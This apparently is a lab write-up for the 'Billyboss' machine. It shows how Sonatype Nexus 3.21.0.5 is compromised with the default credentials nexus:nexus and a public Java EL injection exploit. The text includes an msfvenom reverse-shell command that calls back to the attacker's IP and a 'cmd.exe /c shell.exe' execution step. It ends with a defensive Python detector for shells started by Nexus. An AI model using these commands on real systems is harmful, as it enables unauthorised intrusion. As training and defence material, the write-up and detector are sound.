# Billyboss

## Information Gathering

`sudo ./nmapAutomator.sh 192.168.170.61 all`

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2Fmvq878Wx5B71mLUFBv4j%2Fimage.png?alt=media\&token=3cddb23e-6104-42bf-b95a-e9f0c9ec11ab)

### Service Enumeration

### HTTP (port 8081)

We see that this is running `Sonatype Nexus Repository Manager 3.21.0.5`.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FBZsnz9ZyGdmW2aM59nHY%2Fimage.png?alt=media\&token=f6c6dc3c-76b3-4703-b75e-3c7bd30530b8)

Trying common default credentials, we find that only `nexus:nexus` works.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2Ftd3mVTysbuoyQ5EBFzal%2Fimage.png?alt=media\&token=607c6c16-c462-4a23-ad49-0aba33fb1240)

## Exploit

Nexus Repository Manager 3 versions 3.21.1 and below are vulnerable to Java EL injection, and there is a public exploit for it that allows a low-privilege user to gain RCE on the target.

{% embed url="<https://www.exploit-db.com/exploits/49385>" %}

First, we generate our payload using `msfvenom`.

`msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.49.170 LPORT=8081`

We then modify the script to download our payload and execute it.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2F9aR8KpFil0mBIOVBzl4f%2Fimage.png?alt=media\&token=422d54e5-9684-4ed8-b04a-f924082102cc)

Next, we execute the script and verify that the payload has been downloaded to our target machine.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FD6lP7oiIws76GesyFV6r%2Fimage.png?alt=media\&token=71a2a6fa-cc7f-4c07-b2ec-6227599f3d80)

Next, we change the CMD command to `'cmd.exe /c shell.exe'` and we run the script again.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FHi5SYkNSVnjRDrB7cc6F%2Fimage.png?alt=media\&token=e02200d7-7dd1-4a54-a008-e3fd15790845)
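From the defender's side, the last step leaves a clear trace: the Nexus service process starting `cmd.exe`. The following is an added example, not part of the original write-up, that triages process-creation records for that parent/child pattern; the install path, the Sysmon-style field names and the sample events are constructed assumptions.

```python
import ntpath

# Assumption: the repository manager runs as nexus.exe, or as java.exe/javaw.exe
# started from a directory whose path contains "nexus".
JVM_NAMES = {"nexus.exe", "java.exe", "javaw.exe"}
# Interpreters and download-capable tools a repository JVM has no reason to start.
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe",
                "bitsadmin.exe", "curl.exe"}

# Constructed process-creation records; field names follow Sysmon Event ID 1.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Apps\nexus\bin\nexus.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c shell.exe"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Apps\nexus\bin\nexus.exe",
     "CommandLine": "nexus.exe /run"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe"},
    {"ParentImage": r"C:\Apps\nexus\jre\bin\java.exe",
     "Image": r"C:\Apps\nexus\shell.exe",
     "CommandLine": "shell.exe"},
]


def is_nexus_jvm(image):
    """True when the image path looks like the Nexus service process."""
    path = image.lower()
    return ntpath.basename(path) in JVM_NAMES and "nexus" in path


def classify(event):
    """Return 'high', 'medium' or None for one process-creation record."""
    if not is_nexus_jvm(event["ParentImage"]):
        return None
    child = ntpath.basename(event["Image"].lower())
    if child in JVM_NAMES and is_nexus_jvm(event["Image"]):
        return None  # launcher starting its own JVM
    return "high" if child in INTERPRETERS else "medium"


def triage(events):
    """Keep only flagged records, paired with their severity."""
    return [(sev, e["CommandLine"]) for e in events if (sev := classify(e))]


if __name__ == "__main__":
    for severity, cmdline in triage(SAMPLE_EVENTS):
        print(severity, cmdline)
```

Any child of the repository JVM is worth a look; interpreters and download tools are rated higher because they match the command execution shown in this write-up.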
